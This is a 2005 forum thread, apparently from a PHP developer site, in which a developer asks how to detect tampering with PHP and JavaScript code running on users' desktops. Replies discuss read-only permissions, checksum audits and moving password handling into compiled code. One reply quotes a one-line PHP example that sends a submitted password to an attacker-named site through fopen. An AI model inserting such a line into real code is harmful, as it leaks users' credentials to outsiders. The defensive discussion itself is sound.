Our app runs on end-users machines (apache2.x + php5). At this moment
it is quite easy for someone (who has access to the console) to insert
a couple lines of php code to steal sensitive info.
Is there a way to check the integrity of the php and javascript code by
using digital signatures/simple hash/etc. ?
What do you do to verify that your code has not been changed by someone
else and everything is leaked to a rogue site?
Thanks for your help
-Han
Sep 23 '05
23  5095 
>Does the admin of the server on which the PHP code is running want the check to work, or does he want to subvert it?
The admin (the user) wants the check to work.
We are trying to protect the user from the cleaning lady, daughter's
boyfriend, the intern, trajan horses, etc.
If it's a user's password, why is it in the PHP script (as distinguished
from a database)? Or are you talking about passwords users enter
into their clients to log in?
I'm talking about the password that user enters to login.
Your md5 suggestion is doable.
Is there a way to force php interpreter to check it?
How do website admins currently protect the php at their site has not
been changed by the interns, isp's, programmers, consultants, etc?
Is this an advantage of compiled code over interpreted code?
If yes, then I guess php was the wrong choice for writing code that
runs on desktop machines.
Thanks
-Han
Han wrote: How do website admins currently protect the php at their site has not
been changed by the interns, isp's, programmers, consultants, etc?
Don't give them the password.
Cheers,
Nicholas Sherlock
Han wrote: Our app runs on end-users machines (apache2.x + php5). At this moment
it is quite easy for someone (who has access to the console) to insert
a couple lines of php code to steal sensitive info.
Is there a way to check the integrity of the php and javascript code by
using digital signatures/simple hash/etc. ?
What do you do to verify that your code has not been changed by someone
else and everything is leaked to a rogue site?
Thanks for your help
-Han
Normal security measures are often taken on the web server. They include:
- making php files "execute only", so it is very difficult to download
ands investigate them.
- storing passwords, encrypted, somewhere outside of the public web
space. That makes them accessible for the server only. If you could
insert code, you would still need some inside info to find them.
Especially if the password file is called "packman.ex e" instead of
"passwords.txt" .
- allow uploading only on directories that do not have execute rights.
Off course, it does not stop the need for a PHP programmer to check the
URL request and the POST parameters for injections.
Best regards
Han (go********@saf eblue.com) wrote:
: Passwords are not stored in plaintext. However, still it's a 2 secs job
: to change this line
: if(strcmp(sha1( 'admin'.$_REQUE ST['pass']),$adminpass)){
: to
: fopen('http://www.badhackerss ite.com/'.$_REQUEST['pass'], "r");
: if(strcmp(sha1( 'admin'.$_REQUE ST['pass']),$adminpass)){
: The admin password is leaked the next time user logs in.
: [excuse the syntax errors]
It's only a 2 secs job if the computer is not secure. If you can't trust
the people with privileged passwords then you're stuck.
In that case, you may wish to have a second "more trusted" person to audit
the computer at random intervals using a check sum program to identify
changes and inspect them. (This is a good idea anyway to identify hacker
intrusions, and to catalog exactly when other changes occured).
--
This programmer available for rent.
I see. The solution must be outside the realm of php.
In our case, this solution wont work as our program runs on user's
desktop.
There is no trusted person (first or second).
- making php files "execute only or read only" seems to be a good
solution. Would that work on windows xp? Would this require ntfs?
Han wrote: - making php files "execute only or read only" seems to be a good
solution. Would that work on windows xp? Would this require ntfs?
I am not a Windows XP expert, but you can probably do that. If you
switch on the Windows-NT-like authentication, you can define a user on
your system that will be used as the web user. After that, you configure
your webserver to use that user's privileges.
You can probably set general directoy permissions from your web server
program as well.
Dikkie Dik (no****@nospam. org) wrote:
: Han wrote:
: > - making php files "execute only or read only" seems to be a good
: > solution. Would that work on windows xp? Would this require ntfs?
: >
: I am not a Windows XP expert, but you can probably do that. If you
: switch on the Windows-NT-like authentication, you can define a user on
: your system that will be used as the web user. After that, you configure
: your webserver to use that user's privileges.
: You can probably set general directoy permissions from your web server
: program as well.
Ah yes, but which person is he going to trust to set that up? Apparently
there is no trusted user at the computer.
Also, yes, xp can certainly do that sort of securtiy with ntfs (which is
the default file system by the way) - but beware of XP home. The default
security settings are that an account is either non-priv or priv, and
since many things like games (from MS even) require priv's, you're liable
to have (or end up with) numerous priv accounts on an xp home machine.
Those priv account holders can do anything if they set their minds to it.
(Perhaps xp home edition can change that aspect of how it works, no idea,
but you still have to have someone you trust to do that.)
--
This programmer available for rent.
After long discussions here and through the help of the people in this
board as well, here is what we are going to do. I hope this helps other
people who would deploy a php based solution at user's desktops.
1. We'll make the files read-only (execute-only wont work right?)
2. We'll move all password related questions to a compiled code
(C/C++). We'll make this non-browser based, so the user is not subject
of a simple fishing attack.
3. At the time when the password is asked (before or after), the
compiled code will go over the php installation and check the md5 (or
sha1) of all the php/javascript code.
4. If there is no mismatch, the password is passed to php
There is only one question we couldnt answer at this moment which is
the following: what are the files for which we need to check.
Is PHP monotonic? By that we mean does adding a file to a directory
changes the behavior of php. If the compiled program checks only the
files we created (php/javascript), is it possible to someone to insert
a file in our directory to change the behavior of php? Is there a file
that I can create that redirects php to a different directory?
This thread has been closed and replies have been disabled. Please start a new discussion. Similar topics | |
by: TechWitch |
last post by:
I posted this to the ms sql clustering news group, but I thought I'd
post it here just in case someone here knew the answser. This problem
has had me baffled for 5 months, and I'm not seeing any support
articles from Microsoft on it, yet. Anyone here got a clue?
About 5 months ago, I posted a query to this group after experiencing
failures with my database maintenance plans (during the verify phase)
that run on SQL Clusters on Windows...
|
by: maricel |
last post by:
I have the following base table structure - DDL:
CREATE TABLE "ADMINISTRATOR"."T1" (
"C1" INTEGER NOT NULL )
IN "TEST_TS" ;
ALTER TABLE "ADMINISTRATOR"."T1"
ADD PRIMARY KEY
|
by: Jim Adams |
last post by:
I'm creating an XML license file and would like to add a digital
signature entry to the file. My VB.Net app will use this signature to
verify the file's integrity.
Can anyone point to some sample code that can do this?
Thanks,
Jim
|
by: Andrew R |
last post by:
Hi
I'm creating a series of forms, each with with around 15-20 text boxes.
The text boxes will show data from tables, but are unbound to make them
more flexible.
I want the form to be used for both adding new data and modifying
existing data. I have created a save button on the form.
When the user clicks the save button, the code checks to see if there
|
by: Brian Tkatch |
last post by:
Is there a way to check the order in which SET INTEGRITY needs to be
applied? This would be for a script with a dynamic list of TABLEs.
B.
| | |
by: SM |
last post by:
Hello,
I've created this 'wonderful' function the embeds a youtube video in a
specified div section using the Javascript DOM. Everything works OK...
until I realize how bad the logical programming was.
See, if you look at the function below, everytime i passed the youtube
video id, i create the object over and over and over .... again and
again and again..... you get the picture.
I could erase the object using and created
again, but...
|
by: WTH |
last post by:
I ask because I've got a windows service I've written that manages failover
and replication for our products (or even 3rd party applications) and it
worked great right until I tested it (for ease of testing purposes) with
Internet Explorer (iexplore.exe) - I was testing handling argument list
buffer overflows.
What I found with iexplore.exe is that because my windows service is running
with high privileges (due to running under the local...
|
by: jerrydigital |
last post by:
Hi,
I have a registration form that uses the javascript validation code I have posted below. I am trying to verify that the user enters a birthdate in the format 01/11/1999
Anyone know how I can incorporate a date format code into my existing code?
Thanks for any help - Jerry
<script type="text/javascript">
<!--
|
by: Frinavale |
last post by:
Apparently I have a lot of questions today regarding JavaScript security.
I've implemented a JavaScript Object that intercepts page submits (postbacks) and then displays a UI prompting the user to confirm(yes)/deny(no)/cancel(close UI/cancel submit) their action.
There may be additional JavaScript methods to execute before displaying the UI and may be additional JavaScript methods to execute upon closing the UI.
I'm thinking about...
|
by: marktang |
last post by:
ONU (Optical Network Unit) is one of the key components for providing high-speed Internet services. Its primary function is to act as an endpoint device located at the user's premises. However, people are often confused as to whether an ONU can Work As a Router. In this blog post, we’ll explore What is ONU, What Is Router, ONU & Router’s main usage, and What is the difference between ONU and Router. Let’s take a closer look !
Part I. Meaning of...
|
by: Oralloy |
last post by:
Hello folks,
I am unable to find appropriate documentation on the type promotion of bit-fields when using the generalised comparison operator "<=>".
The problem is that using the GNU compilers, it seems that the internal comparison operator "<=>" tries to promote arguments from unsigned to signed.
This is as boiled down as I can make it.
Here is my compilation command:
g++-12 -std=c++20 -Wnarrowing bit_field.cpp
Here is the code in...
| | |
by: jinu1996 |
last post by:
In today's digital age, having a compelling online presence is paramount for businesses aiming to thrive in a competitive landscape. At the heart of this digital strategy lies an intricately woven tapestry of website design and digital marketing. It's not merely about having a website; it's about crafting an immersive digital experience that captivates audiences and drives business growth.
The Art of Business Website Design
Your website is...
|
by: agi2029 |
last post by:
Let's talk about the concept of autonomous AI software engineers and no-code agents. These AIs are designed to manage the entire lifecycle of a software development project—planning, coding, testing, and deployment—without human intervention. Imagine an AI that can take a project description, break it down, write the code, debug it, and then launch it, all on its own....
Now, this would greatly impact the work of software developers. The idea...
|
by: isladogs |
last post by:
The next Access Europe User Group meeting will be on Wednesday 1 May 2024 starting at 18:00 UK time (6PM UTC+1) and finishing by 19:30 (7.30PM).
In this session, we are pleased to welcome a new presenter, Adolph Dupré who will be discussing some powerful techniques for using class modules.
He will explain when you may want to use classes instead of User Defined Types (UDT). For example, to manage the data in unbound forms.
Adolph will...
|
by: conductexam |
last post by:
I have .net C# application in which I am extracting data from word file and save it in database particularly. To store word all data as it is I am converting the whole word file firstly in HTML and then checking html paragraph one by one.
At the time of converting from word file to html my equations which are in the word document file was convert into image.
Globals.ThisAddIn.Application.ActiveDocument.Select();...
|
by: 6302768590 |
last post by:
Hai team
i want code for transfer the data from one system to another through IP address by using C# our system has to for every 5mins then we have to update the data what the data is updated we have to send another system
|
by: muto222 |
last post by:
How can i add a mobile payment intergratation into php mysql website.
| | |
by: bsmnconsultancy |
last post by:
In today's digital era, a well-designed website is crucial for businesses looking to succeed. Whether you're a small business owner or a large corporation in Toronto, having a strong online presence can significantly impact your brand's success. BSMN Consultancy, a leader in Website Development in Toronto offers valuable insights into creating effective websites that not only look great but also perform exceptionally well. In this comprehensive...
| |
